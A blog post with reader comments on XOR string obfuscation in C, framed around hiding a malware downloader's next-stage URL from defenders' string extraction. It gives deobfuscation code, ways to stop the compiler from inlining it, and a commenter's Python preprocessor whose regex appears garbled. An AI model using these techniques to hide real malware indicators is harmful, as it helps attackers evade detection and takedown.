DIY String obfuscation for plain C



Say you want to write a C program, but you want to avoid including plain strings within the binary. This is something often done by malware authors, for example, to avoid easy extraction of so called indicators of compromise. I can also imagine a legitimate business that uses string obfuscation to make reverse engineering of their software harder to protect their intellectual property. This is often called string obfuscation.

Motivation

Let's stay with malware as an example use-case for string obfuscation and let's also consider a simple downloader, i.e. a malware with the sole purpose to download something from the Internet - the so called next stage - and execute it on the targeted system. Let's further assume, the downloader uses HTTP. This is a common choice for malware authors, probably because it nicely blends into legitimate network traffic and it is easy to use: The Windows API supports HTTP natively and setting up a HTTP server is easy as pie. Since the downloader somhow needs to know, what to download, the URL of the next-stage has to be contained in the downloader somehow. Calling strings malware.exe | grep http for example is a very easy way to "extract" the next-stage URL from malware when it is just included as a plain string in the binary. But the author ((or, to be more precise, the operator of the malware)) has an interest in making it harder to extract the URL from the malware: If I - as a defender - can extract the next-stage URL that easily, I can just block the URL (or even the domain) from resolving in my network and hence make the malware ineffective. Depending on where the next-stage URL is hosted, it may even be possible to notify the hoster of malicious activity and cause a take down of the URL or domain.

The Naïve Approach

The most obvious approach the archive the goal is, to replace every string in the source code with a call to a function that returns the actual string. So
download("http://example.com/next-stage.exe")
would become something like
download(deobfuscate("mambojumbo123", "more arguments if needed", 123))
Doing this by hand is annoying, time consuming and error prone. So let's automate this step, i.e. call some sort of pre-processor that takes the original source code as input and outputs source code with all strings replaced by calls to the deobfuscate function. But there is a problem with this approach: The original source code used a constant string, which does not need to be freed explicitly. But the deobfuscate function will allocate some new memory (on the heap) to put the deobfuscated variant of the string in it. Hence the program will start to leak memory, which is unacceptable!

Don't Leak

To avoid memory leakage, we want to somehow establish a contract with the user of this obfuscation technique, such that "protected strings" are freed after use. Let's re-implement strdup but give it a different name:
char *protect(char *s) {
    char *ret = malloc(sizeof(char) * (strlen(s) + 1));
    if (ret == NULL) return NULL;
    strcpy(ret, s);
    return ret;
} 
The function accepts a string as its only argument, allocates enough memory to store a copy of it and returns a pointer to this memory. The contract with the author of C code now is, that every string that should be obfuscated, needs to be passed to the protect function. This forces a developer to free the string after usage:
char *s = protect("http://example.com/next-stage.exe");
if (s != NULL) {
    download(s);
    free(s);
}
This also makes pattern-matching for string much easier: we can just regex for something like this
protect\("([^"]+?)"\)
and replace it with calls to deobfuscate.

Concrete Obfuscation

Up to this point, we haven't talked about a concrete implementation of the obfuscation. For starters, we will take something simple: generate a random array - a key - for every string to be protected and deobfuscate just XORs the obfuscated string with the key to get the original string back:
char *deobfuscate(char *buffer, int len, char *key, int key_len) {
    char *ret = malloc(sizeof(char) * (len + 1));
    ret[len] = '\0';
    for (int i = 0; i < len; i++) {
        ret[i] = buffer[i] ^ key[i % key_len];
    }
    return ret;
}
So Instead of protect("example.com") the source code that will be compiled will contain something like this:
deobfuscate("\x3a\xe1\x08\x12\x60\xd0\x6f\x71\xfa\x06\x12", 11, "\x5f\x99\x69\x7f\x10\xbc\x0a", 7);
The original source codes will only contain calls to protect and no calls to deobfuscate and the source code with obfuscated strings will not contain any calls to the protect function anymore and only calls to deobfuscate. Implementation of such a pre-processing script is left as an exercise to the reader.

The Twist

I felt pretty confident with this second approach, compiled the source code with all interesting strings obfuscated and called strings on the resulting executable. To my surprise, it still contains the next-stage URL. Or at least, fragments of it. To understand, what happened, I launched Ghidra ((The Reverse Engineering Tool developed by the NSA and released as open source a few months ago. This is a big deal because it basically democratized the reverse engineering community ... but I digress)) and threw the binary into it. The place where there should have been a call to deobfuscate just lead to the following decompiled code:
BYTE *Memory = malloc(0xc);
if (Memory != NULL) {
    *(Memory + 8) = 0x6d6f63;
    *Memory = 0x2e656c706d617865;
    /* ... */
}
There is no call to deobfuscate but merely a call to malloc. And where do these hexadecimal numbers come from? Taking endianness into account, the two assignments result in an array with the following content:
{0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x00, 0x00, 0x00, 0x00}
which is equivalent to the string example.com. And while it was harder to extract the string from the binary, this is not the intended result! What happened? You might already have guessed that the deobfuscate function was inlined by the compiler as a performance optimization. This explains why the call to deobfuscate is gone and the call to malloc from within the function is there. And the compiler figured out that the for loop only depends on variables that have constant values. Which makes it possible to execute the loop at compile time and just generate code that assigns the content from after the loop to the array.

The Solution

Disabling -O3 optimization was not an option for me. I talked with tobi about this and he suggested a very simple solution: the compiler is only able to inline the deobfuscate function because it knows at compile time, how deobfuscate is defined. Placing the function into a separate module - which is a good idea anyway to make code reusage easier - avoids the above-described optimization entirely because the compiler only knows at link-time, how deobfuscate is defined, which is too late for compile-time optimizations. The result is a binary that does not contain the string in plain text anymore! Great success.

3 Replies to “DIY String obfuscation for plain C”

  1. There are some other options: Turn off optimization for a certain part of code: For GCC:
    #pragma GCC push_options
    #pragma GCC optimize ("O0")
    void foo(void) {}
    #pragma GCC pop_options
    
    For MSVC:
    #pragma optimize( "", off )
    void foo(void) {}
    #pragma optimize( "", on ) 
    
    Do Not inline: GCC
    void __attribute__ ((noinline)) foo() {}
    
    MSVC:
    __declspec(noinline)
    void foo(void) {}
    
  2. use it: python3 script.py code.c
    import re
    import binascii
    import itertools
    import sys, getopt
    
    def byte_xor(ba1, ba2):
        return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])
    
    def encode_plaintext(plaintext):
        one_time_pad = bytes([0x01, 0x0c, 0x1e]) # put here your key 
        one_time_pad *= 100 # should exceed any string in your C code
        ciphertext = byte_xor(bytes(plaintext, 'ascii'), one_time_pad)
        return ciphertext
    
    def main(argv):
        p = re.compile(r"protect("(.+?)")") #slightly fixed
    
        for filepath in argv:   
            with open(filepath, 'r+') as content_file:
                content = content_file.read()
    
            matches = p.finditer(content, re.MULTILINE)
    
            for matchNum, match in enumerate(matches, start=1):
                print("Match {matchNum} was found at {start}-{end}: {match}".format(matchNum = matchNum, start = match.start(), end = match.end(), match = match.group()))
    
                for groupNum in range(0, len(match.groups())):
                    groupNum = groupNum + 1
                    
                    plaintext = match.group(groupNum)
                    # print("Group {groupNum} found at {start}-{end}: {group}".format(groupNum = groupNum, start = match.start(groupNum), end = match.end(groupNum), group = plaintext))
    
                    encoded_bytes = encode_plaintext(plaintext)
                    formated_str = "deobfuscate("" + "".join(str(hex(encoded_byte)).replace("0x", "\x") for encoded_byte in encoded_bytes) + "", " + str(len(encoded_bytes)) +")"
    
                    print(plaintext, ":encoded to:", formated_str)
                    content = content.replace(match.group(), formated_str)
            # print(content)
    
            f = open(filepath, "w")
            f.write(content)
            f.close()
            pass
        return 0
    
    if __name__ == "__main__":
        main(sys.argv[1:])
    

Leave a Reply

Your email address will not be published. Required fields are marked *